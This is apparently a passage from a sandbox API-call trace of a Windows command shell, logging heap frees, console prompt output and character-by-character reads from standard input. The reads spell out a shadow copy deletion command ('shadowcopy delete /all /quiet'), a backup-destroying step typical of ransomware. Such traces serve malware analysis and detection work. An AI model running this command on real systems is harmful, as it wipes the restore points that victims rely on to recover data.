lpMem=0x2faa10 | out: hHeap=0x2e0000) returned 1 [0212.771] GetProcessHeap () returned 0x2e0000 [0212.771] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f6510 | out: hHeap=0x2e0000) returned 1 [0212.771] GetProcessHeap () returned 0x2e0000 [0212.771] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4610 | out: hHeap=0x2e0000) returned 1 [0212.771] GetProcessHeap () returned 0x2e0000 [0212.771] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f97c0 | out: hHeap=0x2e0000) returned 1 [0212.771] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef8b8 | out: _Buffer="\r\n") returned 2 [0212.771] _get_osfhandle (_FileHandle=1) returned 0xa8 [0212.771] GetFileType (hFile=0xa8) returned 0x3 [0212.771] _get_osfhandle (_FileHandle=1) returned 0xa8 [0212.771] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0212.771] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ef888, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1ef888*=0x2, lpOverlapped=0x0) returned 1 [0212.771] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0212.771] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0212.771] _vsnwprintf (in: _Buffer=0x4ab3eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1ef8c8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0212.771] _vsnwprintf (in: _Buffer=0x4ab3eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x1ef8c8 | out: _Buffer=">") returned 1 [0212.771] _get_osfhandle (_FileHandle=1) returned 0xa8 [0212.771] GetFileType (hFile=0xa8) returned 0x3 [0212.771] _get_osfhandle (_FileHandle=1) returned 0xa8 [0212.771] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0212.771] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1ef8b8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1ef8b8*=0x14, lpOverlapped=0x0) returned 1 [0212.771] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.771] GetFileType (hFile=0x9c) returned 0x3 [0212.771] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.771] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.773] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.773] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e320, cchWideChar=1 | out: lpWideCharStr="bmic shadowcopy delete\n /all /quiet\n") returned 1 [0212.773] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.773] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.773] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.773] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e322, cchWideChar=1 | out: lpWideCharStr="cic shadowcopy delete\n /all /quiet\n") returned 1 [0212.773] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.773] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.773] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.773] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e324, cchWideChar=1 | out: lpWideCharStr="dc shadowcopy delete\n /all /quiet\n") returned 1 [0212.773] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.773] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.773] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.773] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e326, cchWideChar=1 | out: lpWideCharStr="e shadowcopy delete\n /all /quiet\n") returned 1 [0212.773] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.773] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.773] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.773] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e328, cchWideChar=1 | out: lpWideCharStr="dshadowcopy delete\n /all /quiet\n") returned 1 [0212.773] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.773] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.773] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.773] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32a, cchWideChar=1 | out: lpWideCharStr="ihadowcopy delete\n /all /quiet\n") returned 1 [0212.773] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.773] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.773] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.773] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32c, cchWideChar=1 | out: lpWideCharStr="tadowcopy delete\n /all /quiet\n") returned 1 [0212.774] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.774] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.774] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.774] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32e, cchWideChar=1 | out: lpWideCharStr=" dowcopy delete\n /all /quiet\n") returned 1 [0212.774] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.774] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.774] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.774] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e330, cchWideChar=1 | out: lpWideCharStr="/owcopy delete\n /all /quiet\n") returned 1 [0212.774] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.774] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.774] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.774] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e332, cchWideChar=1 | out: lpWideCharStr="swcopy delete\n /all /quiet\n") returned 1 [0212.774] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.774] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.774] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.774] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e334, cchWideChar=1 | out: lpWideCharStr="ecopy delete\n /all /quiet\n") returned 1 [0212.774] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.774] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.774] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.774] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e336, cchWideChar=1 | out: lpWideCharStr="topy delete\n /all /quiet\n") returned 1 [0212.774] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.774] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.774] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.774] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e338, cchWideChar=1 | out: lpWideCharStr=" py delete\n /all /quiet\n") returned 1 [0212.774] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.774] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.774] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.774] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33a, cchWideChar=1 | out: lpWideCharStr="{y delete\n /all /quiet\n") returned 1 [0212.774] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.774] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.774] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.774] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33c, cchWideChar=1 | out: lpWideCharStr="d delete\n /all /quiet\n") returned 1 [0212.775] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.775] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.775] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.775] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33e, cchWideChar=1 | out: lpWideCharStr="edelete\n /all /quiet\n") returned 1 [0212.775] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.775] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.775] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.775] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e340, cchWideChar=1 | out: lpWideCharStr="felete\n /all /quiet\n") returned 1 [0212.775] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.775] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.775] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.775] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e342, cchWideChar=1 | out: lpWideCharStr="alete\n /all /quiet\n") returned 1 [0212.775] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.775] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.775] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.775] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e344, cchWideChar=1 | out: lpWideCharStr="uete\n /all /quiet\n") returned 1 [0212.775] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.775] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.776] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.776] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e346, cchWideChar=1 | out: lpWideCharStr="lte\n /all /quiet\n") returned 1 [0212.776] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.777] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.777] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.777] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e348, cchWideChar=1 | out: lpWideCharStr="te\n /all /quiet\n") returned 1 [0212.777] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.777] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.777] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.777] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34a, cchWideChar=1 | out: lpWideCharStr="}\n /all /quiet\n") returned 1 [0212.777] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.777] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.777] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.777] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34c, cchWideChar=1 | out: lpWideCharStr=" /all /quiet\n") returned 1 [0212.777] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.777] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.777] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.777] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34e, cchWideChar=1 | out: lpWideCharStr="b/all /quiet\n") returned 1 [0212.777] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.777] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.777] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.777] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e350, cchWideChar=1 | out: lpWideCharStr="oall /quiet\n") returned 1 [0212.777] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.777] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.777] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.777] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e352, cchWideChar=1 | out: lpWideCharStr="oll /quiet\n") returned 1 [0212.777] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.777] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.778] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.778] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e354, cchWideChar=1 | out: lpWideCharStr="tl /quiet\n") returned 1 [0212.778] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.778] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.778] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.778] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e356, cchWideChar=1 | out: lpWideCharStr="s /quiet\n") returned 1 [0212.778] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.778] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.778] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.778] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e358, cchWideChar=1 | out: lpWideCharStr="t/quiet\n") returned 1 [0212.778] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.778] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.778] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.778] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35a, cchWideChar=1 | out: lpWideCharStr="aquiet\n") returned 1 [0212.778] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.778] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.778] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.778] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35c, cchWideChar=1 | out: lpWideCharStr="tuiet\n") returned 1 [0212.778] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.778] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.778] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.778] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35e, cchWideChar=1 | out: lpWideCharStr="uiet\n") returned 1 [0212.778] _get_osfhandle (_FileHandle=0) returned 0x9c [0212.778] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.778] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0212.779] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e360, cchWideChar=1 | out: lpWideCharStr="set\n") returned 1 